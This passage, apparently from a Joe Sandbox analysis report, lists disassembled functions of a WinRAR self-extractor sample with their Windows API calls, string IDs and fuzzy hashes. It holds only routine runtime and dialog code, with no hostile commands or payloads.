                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                    • API String ID: 176396367-3743748572
                                                                    • Opcode ID: ad4f4a5315dc8adecc46bd6914006a7d3d546af360338f6d4e2f288394714e1d
                                                                    • Instruction ID: 39fc394dbf4852117dd8304fd92c98e7e14d936fcf3edab21cf34800c5c43bd5
                                                                    • Opcode Fuzzy Hash: ad4f4a5315dc8adecc46bd6914006a7d3d546af360338f6d4e2f288394714e1d
                                                                    • Instruction Fuzzy Hash: EA31D22264430596D630EB909C42BB7B3E4EB51330F54402FF681572C1FF61EC468BB0
                                                                    APIs
                                                                      • Part of subcall function 00DBEEB8: _free.LIBCMT ref: 00DBEEE1
                                                                    • _free.LIBCMT ref: 00DBEF42
                                                                      • Part of subcall function 00DBBAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?), ref: 00DBBB10
                                                                      • Part of subcall function 00DBBAFA: GetLastError.KERNEL32(?,?,00DBEEE6,?,00000000,?,00000000,?,00DBEF0D,?,00000007,?,?,00DBF30A,?,?), ref: 00DBBB22
                                                                    • _free.LIBCMT ref: 00DBEF4D
                                                                    • _free.LIBCMT ref: 00DBEF58
                                                                    • _free.LIBCMT ref: 00DBEFAC
                                                                    • _free.LIBCMT ref: 00DBEFB7
                                                                    • _free.LIBCMT ref: 00DBEFC2
                                                                    • _free.LIBCMT ref: 00DBEFCD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                    • Instruction ID: ee271eeb90c145051631ed74b827dfbafc2b4b6766f682295d8c8993e292d6d3
                                                                    • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
                                                                    • Instruction Fuzzy Hash: 3511BA72940B04EAE520F7B1CC46FCB7BACEF08711F404815F69BA6192DAB5E505C774
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00DB0B46,00DB0AA9,00DB0D4A), ref: 00DB0AE2
                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DB0AF8
                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DB0B0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                    • API String ID: 667068680-1718035505
                                                                    • Opcode ID: 7b8e603fd635cf8048ae82f769b9b4ffb700a249c91d1128f4c77b489574c5d3
                                                                    • Instruction ID: f61bde21340fd485c95f00d79de59e195c4792741dd857c6603e339d2f4f18ba
                                                                    • Opcode Fuzzy Hash: 7b8e603fd635cf8048ae82f769b9b4ffb700a249c91d1128f4c77b489574c5d3
                                                                    • Instruction Fuzzy Hash: BCF0AF31752723EB1B209FA46C95EFB2A8C9E053993790439A643D3744EA50C885E2F4
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00DA4192
                                                                    • _wcslen.LIBCMT ref: 00DA41A3
                                                                    • _wcslen.LIBCMT ref: 00DA41B3
                                                                    • _wcslen.LIBCMT ref: 00DA41C1
                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00D9D2D3,?,?,00000000,?,?,?), ref: 00DA41DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$CompareString
                                                                    • String ID: <
                                                                    • API String ID: 3397213944-4251816714
                                                                    • Opcode ID: 51c2b592f6fb5038530cd6aa40010a38ede59413e377dca891d9f02969f23d57
                                                                    • Instruction ID: 273c990f513303338fdcc45449b7d3b5f92f33f6f78dfa64ef4048ea7363ccf2
                                                                    • Opcode Fuzzy Hash: 51c2b592f6fb5038530cd6aa40010a38ede59413e377dca891d9f02969f23d57
                                                                    • Instruction Fuzzy Hash: EFF01D32048158BFCF121F55EC09DCA3F26EB91B70B218425F61A5B061CA72D59196F0
                                                                    APIs
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00DA35E6
                                                                      • Part of subcall function 00D9D076: GetVersionExW.KERNEL32(?), ref: 00D9D0A7
                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DA360A
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DA3624
                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00DA3637
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3647
                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA3657
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                    • String ID:
                                                                    • API String ID: 2092733347-0
                                                                    • Opcode ID: 650b4d795458d0222d9f4e1d7a58c0724491bd2e015feb63aee11cef9486c93a
                                                                    • Instruction ID: eb76c3a9f444316438c5bfc45519853a2327302f787be5e1208d037386a00541
                                                                    • Opcode Fuzzy Hash: 650b4d795458d0222d9f4e1d7a58c0724491bd2e015feb63aee11cef9486c93a
                                                                    • Instruction Fuzzy Hash: 2841F576108306ABCB04DFA8C88499BB7E8FF98704F04491EF999C7310E730D909CBA6
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,00DB5111,00DB4ECC,00DB21B4), ref: 00DB5128
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DB5136
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DB514F
                                                                    • SetLastError.KERNEL32(00000000,00DB5111,00DB4ECC,00DB21B4), ref: 00DB51A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 94c717409ef5e38dcd7fce7afc560790d7a5a3474fb5b52a4c24fd927f2db4f3
                                                                    • Instruction ID: 457c54a946ab71dd45a520837bf5eed29415bd643c71e7c76217430aaf30d361
                                                                    • Opcode Fuzzy Hash: 94c717409ef5e38dcd7fce7afc560790d7a5a3474fb5b52a4c24fd927f2db4f3
                                                                    • Instruction Fuzzy Hash: 6601FC32509712EDA6252B7CBC457F63B94EB113B0B64132AF112D56E4EF518C459174
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00DD50C4,00DB6E12,00DD50C4,?,?,00DB688D,?,?,00DD50C4), ref: 00DBB9A9
                                                                    • _free.LIBCMT ref: 00DBB9DC
                                                                    • _free.LIBCMT ref: 00DBBA04
                                                                    • SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA11
                                                                    • SetLastError.KERNEL32(00000000,?,00DD50C4), ref: 00DBBA1D
                                                                    • _abort.LIBCMT ref: 00DBBA23
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free$_abort
                                                                    • String ID:
                                                                    • API String ID: 3160817290-0
                                                                    • Opcode ID: 17a9dda82956ffe124901f1d52121242dbf090a300aa6b010db23eeffbb32615
                                                                    • Instruction ID: c2fe81f4e4c0228c94bfc058a754e384d68ae409f4dba89811811f2ae0a68bdd
                                                                    • Opcode Fuzzy Hash: 17a9dda82956ffe124901f1d52121242dbf090a300aa6b010db23eeffbb32615
                                                                    • Instruction Fuzzy Hash: 12F0A436904702EBC62573266C0AEEB2A6ADFC2735F250117F617E2292FFE1CC055571
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DB0059
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DB0073
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DB0084
                                                                    • TranslateMessage.USER32(?), ref: 00DB008E
                                                                    • DispatchMessageW.USER32(?), ref: 00DB0098
                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DB00A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 2148572870-0
                                                                    • Opcode ID: c1177eba373bc64c520e6b25b1527063a482f9a19c6a08a91adba76af361a30b
                                                                    • Instruction ID: 5a44593b2a71c0254d3f507d7340804f326df4130f6aafc9e42c5b45a572290a
                                                                    • Opcode Fuzzy Hash: c1177eba373bc64c520e6b25b1527063a482f9a19c6a08a91adba76af361a30b
                                                                    • Instruction Fuzzy Hash: 5FF0C472A0122AAACA206BA5DC4DEDB7E7DEF52791B048021F50BE2150DA64D586CAB0
                                                                    APIs
                                                                    • EndDialog.USER32(?,00000001), ref: 00DAD57B
                                                                    • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 00DAD591
                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00DAD5B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$Dialog
                                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                    • API String ID: 1770891597-1315819833
                                                                    • Opcode ID: 23a2370cd66f3a2a2f531767dab000114ed3ac71335e6d5811023a21c52f46b2
                                                                    • Instruction ID: 15667a618ffb2d830eb9e497f486d0ba62406c5fdb9307d5cf6ae9376f875be7
                                                                    • Opcode Fuzzy Hash: 23a2370cd66f3a2a2f531767dab000114ed3ac71335e6d5811023a21c52f46b2
                                                                    • Instruction Fuzzy Hash: 2341B172904209ABEB30AB64DC45FFE77ADEB4A304F14442AF60AE7581DB70A9448B75
                                                                    APIs
                                                                      • Part of subcall function 00DA2663: _wcslen.LIBCMT ref: 00DA2669
                                                                      • Part of subcall function 00D9D848: _wcsrchr.LIBVCRUNTIME ref: 00D9D85F
                                                                    • _wcslen.LIBCMT ref: 00D9E105
                                                                    • _wcslen.LIBCMT ref: 00D9E14D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_wcsrchr
                                                                    • String ID: .exe$.rar$.sfx
                                                                    • API String ID: 3513545583-31770016
                                                                    • Opcode ID: 4167488d2dbb71d591faccbd857205b17b061437e8d3390a603c58952b1bbe4c
                                                                    • Instruction ID: 19561a1f09196bc9e356787c96f01c51b438ee1c58d7c36eff1c29292f69d66e
                                                                    • Opcode Fuzzy Hash: 4167488d2dbb71d591faccbd857205b17b061437e8d3390a603c58952b1bbe4c
                                                                    • Instruction Fuzzy Hash: 15412422500B1199CF32EF34C846F7BB7A9EF45B54B18490EF8C9AB181E7A19D81C375
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00D9DA59
                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D9BD19,?,?,00000800,?,?,?,00D9BCD4), ref: 00D9DB02
                                                                    • _wcslen.LIBCMT ref: 00D9DB70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$CurrentDirectory
                                                                    • String ID: UNC$\\?\
                                                                    • API String ID: 3341907918-253988292
                                                                    • Opcode ID: 8a61fcf4b56853937524f0e333548f2447325e73f16b05a7bb984f420c191ac5
                                                                    • Instruction ID: 8ac61926a0391ac9498d8ceda9a5c451d618f72753d07504cec096fc3630f51c
                                                                    • Opcode Fuzzy Hash: 8a61fcf4b56853937524f0e333548f2447325e73f16b05a7bb984f420c191ac5
                                                                    • Instruction Fuzzy Hash: 6F418F36504381AADF20AB608C81EFFB3BEEF5A744F090869F58493141E7A8DD85C672
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00D9BD93
                                                                    • _wcslen.LIBCMT ref: 00D9BDB6
                                                                    • _wcslen.LIBCMT ref: 00D9BE4C
                                                                    • _wcslen.LIBCMT ref: 00D9BEB1
                                                                      • Part of subcall function 00D9C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00D9C3A5
                                                                      • Part of subcall function 00D9BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 00D9BC1C
                                                                      • Part of subcall function 00D9BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 00D9BC48
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                    • String ID: vC`
                                                                    • API String ID: 973666142-1023373374
                                                                    • Opcode ID: 4119b87f658b5539263730f7b12261304471c01d406c8193558c533f0fcb8ee3
                                                                    • Instruction ID: c6c9a98b5a0bd9a20701cf55cab7fbfed1a4b9f902ef0c6fee3495f110ce13c7
                                                                    • Opcode Fuzzy Hash: 4119b87f658b5539263730f7b12261304471c01d406c8193558c533f0fcb8ee3
                                                                    • Instruction Fuzzy Hash: E841C27250879096CF30AB64A9459FBB3EDDF84310F46481FFA8A93141EB74D988C6B1
                                                                    APIs
                                                                    • LoadBitmapW.USER32(00000065), ref: 00DAD9ED
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00DADA12
                                                                    • DeleteObject.GDI32(00000000), ref: 00DADA44
                                                                    • DeleteObject.GDI32(00000000), ref: 00DADA67
                                                                      • Part of subcall function 00DAC652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00DADA3D,00000066), ref: 00DAC665
                                                                      • Part of subcall function 00DAC652: SizeofResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC67C
                                                                      • Part of subcall function 00DAC652: LoadResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC693
                                                                      • Part of subcall function 00DAC652: LockResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC6A2
                                                                      • Part of subcall function 00DAC652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6BD
                                                                      • Part of subcall function 00DAC652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6CE
                                                                      • Part of subcall function 00DAC652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DAC737
                                                                      • Part of subcall function 00DAC652: GlobalUnlock.KERNEL32(00000000), ref: 00DAC756
                                                                      • Part of subcall function 00DAC652: GlobalFree.KERNEL32(00000000), ref: 00DAC75D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                    • String ID: ]
                                                                    • API String ID: 1428510222-3352871620
                                                                    • Opcode ID: 7d4d2b808e60a872e59c048e0ac8d137e7ceca118ed8c8d8b4f170a5e22f20fc
                                                                    • Instruction ID: 17320b53590edf9c4105711243409d90f2592193d0650e21d8981a3a07cf2c24
                                                                    • Opcode Fuzzy Hash: 7d4d2b808e60a872e59c048e0ac8d137e7ceca118ed8c8d8b4f170a5e22f20fc
                                                                    • Instruction Fuzzy Hash: BA01DE329443056BCB12A7649C0AABF3A7AEF83B61F180010F805E7395DF31CC1686B0
                                                                    APIs
                                                                      • Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
                                                                      • Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0
                                                                    • EndDialog.USER32(?,00000001), ref: 00DAF99B
                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00DAF9B1
                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00DAF9C5
                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00DAF9D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ItemText$DialogWindow
                                                                    • String ID: RENAMEDLG
                                                                    • API String ID: 445417207-3299779563
                                                                    • Opcode ID: f20e22ec262b0e75d3d80808d9d6552d4bd9539dbbb6d34fc04603fc4af1be37
                                                                    • Instruction ID: 82b5b40847fa7309a5f9580213c1c7d2cc4b1bd1b6d85d36cbcf3200cff3c97d
                                                                    • Opcode Fuzzy Hash: f20e22ec262b0e75d3d80808d9d6552d4bd9539dbbb6d34fc04603fc4af1be37
                                                                    • Instruction Fuzzy Hash: 4401F1332843107AE2114BA89C09FBBBB6CFB5A701F158465F341E22A0C662DA05CB75
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DBA676,?,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002), ref: 00DBA6E5
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DBA6F8
